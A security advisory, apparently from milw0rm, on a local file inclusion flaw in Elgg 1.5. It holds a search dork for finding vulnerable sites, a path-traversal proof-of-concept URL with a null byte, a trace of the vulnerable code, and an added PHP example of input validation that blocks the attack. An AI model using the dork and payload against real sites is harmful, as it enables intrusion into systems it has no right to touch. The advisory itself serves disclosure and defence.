Product: elgg.org
Version: <= 1.5
Dork: "Powered by Elgg, the leading open source social networking platform"

eLwaux(c)2009
UASC.org.UA

POC: /_css/js.php?js=../../../../tmp/session_dir%00&viewtype=xD

Requirement: the 'datalists' table must contain the record 'simplecache_enabled' = 0
(the default is 'simplecache_enabled' = 1)

Vulnerability Code:
-----------------------------------------------------------------------
/_css/js.php:
33: $viewinput['view'] = 'js/' . $_GET['js'];
42: require_once(dirname(dirname(__FILE__)) . '/simplecache/view.php');
/simplecache/view.php:
26: $view = $viewinput['view'];
30: if (@mysql_select_db($CONFIG->dbname,$mysql_dblink)) {
48: if ($simplecache_enabled || $override) {
49: $filename = $dataroot . 'views_simplecache/' . md5($viewtype . $view);
51: $contents = file_get_contents($filename);
56: } else {
59: $contents = elgg_view($view);
/lib/elgglib.php:
237: function elgg_view($view, ..
317: foreach($viewlist as $priority => $view) {
321: if (file_exists($view_location . "{$viewtype}/{$view}.php") &&
     !include($view_location . "{$viewtype}/{$view}.php")) {
-----------------------------------------------------------------------
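
The trace above shows the js request value passing from $_GET into include() with only a 'js/' prefix added. The following is an added example (not code from the advisory or from Elgg) of validating both path components before any file access; safe_name(), resolve_view_file() and the views-root layout are hypothetical names chosen for illustration.

```php
<?php
// Added example, not Elgg code. Function names and the directory layout are
// hypothetical; the checks mirror the "{$viewtype}/{$view}.php" include above.

// Accept only [A-Za-z0-9_-] segments; '/' is allowed between segments of a view
// name but never in a viewtype. Rejects "..", NUL bytes, '\' and absolute paths.
function safe_name($value, $allowSlash)
{
    if (!is_string($value) || strlen($value) > 128) {
        return null;
    }
    $pattern = $allowSlash
        ? '#\A[A-Za-z0-9_-]+(?:/[A-Za-z0-9_-]+)*\z#'
        : '#\A[A-Za-z0-9_-]+\z#';
    return preg_match($pattern, $value) === 1 ? $value : null;
}

// Map (viewtype, view) to a file under $viewsRoot, or null if anything is off.
function resolve_view_file($viewsRoot, $viewtype, $view)
{
    $viewtype = safe_name($viewtype, false);
    $view = safe_name($view, true);
    $root = realpath($viewsRoot);
    if ($viewtype === null || $view === null || $root === false) {
        return null;
    }
    $path = realpath("$root/$viewtype/$view.php");
    // Defence in depth: after symlink resolution the file must still be inside root.
    if ($path === false || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo data: a throwaway views root holding one legitimate view.
$root = sys_get_temp_dir() . '/views_demo_' . getmypid();
mkdir($root . '/default/js', 0700, true);
file_put_contents($root . '/default/js/example.php', "/* js view */\n");

$cases = array(
    array('default', 'js/example'),                       // legitimate view
    array('default', "js/../../../../tmp/session_dir\0"), // decoded form of the PoC value
    array('../default', 'js/example'),                    // traversal via viewtype
    array('xD', 'js/example'),                            // well-formed but no such file
);
foreach ($cases as $case) {
    $file = resolve_view_file($root, $case[0], $case[1]);
    echo json_encode($case), ' => ', $file === null ? 'rejected' : 'accepted', "\n";
}
```

Only the first case resolves to a file; the other three return null before any include() could be reached.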

# milw0rm.com [2009-08-04]
elgg 1.5 _cssjs.php Local File Inclusion Vulnerability
eLwaux
08/04/2009